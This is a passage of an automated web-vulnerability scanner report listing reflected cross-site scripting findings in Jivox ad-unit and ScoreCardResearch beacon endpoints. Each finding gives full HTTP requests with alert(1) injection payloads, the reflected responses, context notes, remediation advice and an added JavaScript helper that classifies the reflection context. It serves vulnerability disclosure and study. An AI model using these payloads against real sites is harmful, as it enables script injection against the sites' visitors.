function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
<a href="http://as.jivox.com/player/proxy.php?campaignId=196281f8fd';alert(1)//af89749ee75&siteId=24bbcd13d37379&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2k
...[SNIP]...

4.93. http://as.jivox.com/unit/jivox_unit_tags.php [creativeUnitType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the creativeUnitType request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8862e'%3balert(1)//e96b38092f was submitted in the creativeUnitType parameter. This input was echoed as 8862e';alert(1)//e96b38092f in the application's response. Note that in this response the initialisers that follow are emitted empty (var playBtnContainerInitHeight = ; and the lines after it), presumably because the altered creativeUnitType no longer matches a known unit type. That is a JavaScript syntax error: if the response is parsed as a single script, none of it, including the injected alert(1), executes. The reflection is real, but exploitation needs a value that keeps the rest of the script valid (compare 4.94, where the same injection into expandUnitType leaves those values intact).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. creativeUnitType is a small integer selecting a unit layout (1 here); validate it as an integer from the known set and reject anything else, which also removes the broken output seen in this response.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=18862e'%3balert(1)//e96b38092f&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:28 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32370


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '18862e';alert(1)//e96b38092f';
    var expandUnitType = '1';    
    this.playBtnOrientation = 'right';
    var playBtnContainerInitHeight = ;
    var playBtnContainerInitWidth = ;
    this.playBtnContainerHeight = ;
    this.playBtnContainerW
...[SNIP]...
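The context descriptions in these entries (a string in single or double quotation marks, an expression not encapsulated in any quotation marks) are what decide whether a reflected quote character matters. The following is an added example, not part of the XSS.CX report and not Jivox's code, that classifies a reflection the same way: a small state machine tracks string and comment state up to the point where the payload appears, then reports whether the payload's quote character survived verbatim and can terminate the enclosing literal. The sample scripts are constructed from the response snippets of 4.89, 4.93 and 4.99, plus two constructed negatives that do not appear on this page (a reflection inside a comment, and one where the server escaped the quote). Template literals and regular-expression literals are not modelled.

```javascript
// Added example (not part of the XSS.CX report and not Jivox's code): classify
// the JavaScript context a reflected payload lands in, the way the issue
// details above describe it. Node.js, runs offline on constructed inputs.

const CONTEXT = {
  DOUBLE: 'double-quoted string',
  SINGLE: 'single-quoted string',
  CODE: 'unquoted expression',
  COMMENT: 'comment',
  NOT_FOUND: 'not reflected verbatim',
};

// Scan `script` up to `index`, tracking string and comment state with
// backslash-escape handling. Template and regex literals are not modelled;
// the responses on this page contain neither.
function contextAt(script, index) {
  let state = CONTEXT.CODE;
  for (let i = 0; i < index; i++) {
    const c = script[i];
    const next = script[i + 1];
    if (state === CONTEXT.CODE) {
      if (c === '"') state = CONTEXT.DOUBLE;
      else if (c === "'") state = CONTEXT.SINGLE;
      else if (c === '/' && next === '/') { state = 'line'; i++; }
      else if (c === '/' && next === '*') { state = 'block'; i++; }
    } else if (state === CONTEXT.DOUBLE || state === CONTEXT.SINGLE) {
      const quote = state === CONTEXT.DOUBLE ? '"' : "'";
      if (c === '\\') i++;                 // skip the escaped character
      else if (c === quote) state = CONTEXT.CODE;
    } else if (state === 'line') {
      if (c === '\n') state = CONTEXT.CODE;
    } else if (state === 'block') {
      if (c === '*' && next === '/') { state = CONTEXT.CODE; i++; }
    }
  }
  return state === 'line' || state === 'block' ? CONTEXT.COMMENT : state;
}

// Where did `payload` land, and does the quote it carries actually terminate
// the enclosing literal? A payload that is not found verbatim was escaped or
// encoded by the server and does not break out.
function classifyReflection(script, payload) {
  const index = script.indexOf(payload);
  if (index === -1) {
    return { context: CONTEXT.NOT_FOUND, unmodified: false, breaksOut: false };
  }
  const context = contextAt(script, index);
  const breaksOut =
    context === CONTEXT.CODE ||
    (context === CONTEXT.DOUBLE && payload.includes('"')) ||
    (context === CONTEXT.SINGLE && payload.includes("'"));
  return { context, unmodified: true, breaksOut };
}

// Constructed samples: the first three are cut from the 4.89, 4.93 and 4.99
// responses in the report; the last two are negatives that never appear there.
const SAMPLES = [
  { script: 'jvxAdPlayer.setServerURL("http://as.jivox.com");\n' +
            'jvxAdPlayer.setFlashVariables("t=1307962892856d9e87"-alert(1)-"50c9a07e8ac&r=0.91");',
    payload: 'd9e87"-alert(1)-"50c9a07e8ac' },
  { script: "function jivoxUnit(){\n    var creativeUnitType = '18862e';alert(1)//e96b38092f';\n}",
    payload: "8862e';alert(1)//e96b38092f" },
  { script: 'if(typeof(jivoxUnit) != "undefined"){\nvar jvxAdPlayer_89411a92;alert(1)//27abb62e794 = new jivoxUnit();\n}',
    payload: '11a92;alert(1)//27abb62e794' },
  { script: 'var a = 1; // debug: d9e87"-alert(1)-"50c9a07e8ac\nvar b = 2;',
    payload: 'd9e87"-alert(1)-"50c9a07e8ac' },
  { script: 'var siteId = "93237\\"-alert(1)-\\"1c0ac26dc9c";',
    payload: '93237"-alert(1)-"1c0ac26dc9c' },
];

function classifyAll() {
  return SAMPLES.map((s) => classifyReflection(s.script, s.payload));
}

console.log(classifyAll());
```

The scanner's "Certain" confidence rests on the first two fields (the payload is present verbatim and the context is a string or bare expression); the breaksOut flag is the part worth re-checking by hand, because a reflection inside a comment or behind a backslash looks identical in a plain text search.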

4.94. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the expandUnitType request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabbc'%3balert(1)//3d9d7ab3ac4 was submitted in the expandUnitType parameter. This input was echoed as eabbc';alert(1)//3d9d7ab3ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. expandUnitType is a small integer (1 here) and should be validated as one from the known set before it reaches the var expandUnitType = '...' assignment; a value that is still emitted must be JavaScript-string-encoded, not concatenated raw.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1eabbc'%3balert(1)//3d9d7ab3ac4&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:29 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32481


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var expandUnitType = '1eabbc';alert(1)//3d9d7ab3ac4';    
    this.playBtnOrientation = 'right';
    var playBtnContainerInitHeight = 90;
    var playBtnContainerInitWidth = 0;
    this.playBtnContainerHeight = 90;
    this.playBtnContainerWidth = 120;
        this.co
...[SNIP]...

4.95. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the expandUnitType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f430e"%3balert(1)//86c1c56c0d3 was submitted in the expandUnitType parameter. This input was echoed as f430e";alert(1)//86c1c56c0d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. This is the same expandUnitType value reflected a second time, here into the viewLayout= field of a URL built inside a double-quoted string (see 4.94 for the single-quoted reflection); validating the parameter as an integer at the point of input fixes both sinks at once, and the URL should in any case be assembled from encoded components rather than by string concatenation.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1f430e"%3balert(1)//86c1c56c0d3&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:29 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32481


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
oPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&jvxSessionId=1307962949.7885&expandedUnit=1&viewLayout=1f430e";alert(1)//86c1c56c0d3&adUnitWidth=&adUnitHeight=";

return slideOutLargeUnit(playerObject.playerExInteractivityDomReference.id, interactivityUrl, "expandedUnit");
}

    function setLargeAdUn
...[SNIP]...

4.96. http://as.jivox.com/unit/jivox_unit_tags.php [mouseAction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the mouseAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce2f"%3balert(1)//55b8c35db09 was submitted in the mouseAction parameter. This input was echoed as fce2f";alert(1)//55b8c35db09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. mouseAction selects which DOM event triggers the unit (mouseOver here, lowercased into the event name passed to attachEventListener); map it on the server to one of a fixed set of event names and emit only that mapped constant, never the raw value.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOverfce2f"%3balert(1)//55b8c35db09 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:37 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32438


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
bject.playerExCloseInteractivityBtnDomReference, "click", function(){playerObject.slideInLargeAdUnit();}, false);
           }
               
               attachEventListener(playerObject.playBtnContainerDomReference, "mouseoverfce2f";alert(1)//55b8c35db09", function(e){playerObject.slideOutLargeAdUnit('19628','24bbcd13d37379');}, false);
       
               
               attachEventListener(playerObject.playerExInteractivityDomReference, "mouseover", function(e){playerObjec
...[SNIP]...

4.97. http://as.jivox.com/unit/jivox_unit_tags.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fcf3"%3balert(1)//d36d2acaf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fcf3";alert(1)//d36d2acaf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The response re-serialises the entire incoming query string into the flash-variables string, which is why even the name of a parameter the player never uses is reflected. Build that string only from the parameters the player actually consumes, each value validated and encoded, and drop everything else.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver&9fcf3"%3balert(1)//d36d2acaf3=1 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:37 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32395


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
EzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.nealtire.com%2F&mouseAction=mouseOver&9fcf3";alert(1)//d36d2acaf3=1&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&jvxSessionId=1307962957.6909&expandedUnit=1&viewLa
...[SNIP]...

4.98. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 724da"%3balert(1)//2a404fbdcee was submitted in the objectName parameter. This input was echoed as 724da";alert(1)//2a404fbdcee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. objectName is reflected here inside a double-quoted string and, in the same response, as a bare variable name (var jvxAdPlayer_894... = new jivoxUnit(); see 4.99). Because it is used as an identifier, encoding cannot make it safe: restrict it to the pattern ^[A-Za-z_][A-Za-z0-9_]*$ (for example jvxAdPlayer_894) and reject the request otherwise.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894724da"%3balert(1)//2a404fbdcee&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:27 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 33059


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
return document.getElementById(movieName);
}
};
   
}

if(typeof(jivoxUnit) != "undefined"){
var jvxAdPlayer_894724da";alert(1)//2a404fbdcee = new jivoxUnit();
var jvxAdPlayer_894724da";alert(1)//2a404fbdceeflashVersion = jvxAdPlayer_894724da";alert(1)//2a404fbdcee.getFlashVersion();
var jvxAdPlayer_894724da";alert(1)//2a404fbdceeversions = jvxAdPlayer_894724da";alert(1)//2a404fbdceeflashVersion.split(','
...[SNIP]...

4.99. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 11a92%3balert(1)//27abb62e794 was submitted in the objectName parameter. This input was echoed as 11a92;alert(1)//27abb62e794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_89411a92%3balert(1)//27abb62e794&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:27 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 33030


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
avigator.appName.indexOf("Microsoft Internet")!=-1)
{
return document.getElementById(movieName);
}
};
   
}

if(typeof(jivoxUnit) != "undefined"){
var jvxAdPlayer_89411a92;alert(1)//27abb62e794 = new jivoxUnit();
var jvxAdPlayer_89411a92;alert(1)//27abb62e794flashVersion = jvxAdPlayer_89411a92;alert(1)//27abb62e794.getFlashVersion();
var jvxAdPlayer_89411a92;alert(1)//27abb62e794versions = j
...[SNIP]...

4.100. http://as.jivox.com/unit/jivox_unit_tags.php [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the siteId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7db45'%3balert(1)//cc2b6fb18db was submitted in the siteId parameter. This input was echoed as 7db45';alert(1)//cc2b6fb18db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d373797db45'%3balert(1)//cc2b6fb18db&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:30 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32263


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
<a href="http://as.jivox.com/player/proxy.php?campaignId=19628&siteId=24bbcd13d373797db45';alert(1)//cc2b6fb18db&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxha
...[SNIP]...

4.101. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f78f6<script>alert(1)</script>46dbba33e76 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7f78f6<script>alert(1)</script>46dbba33e76&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:22 GMT
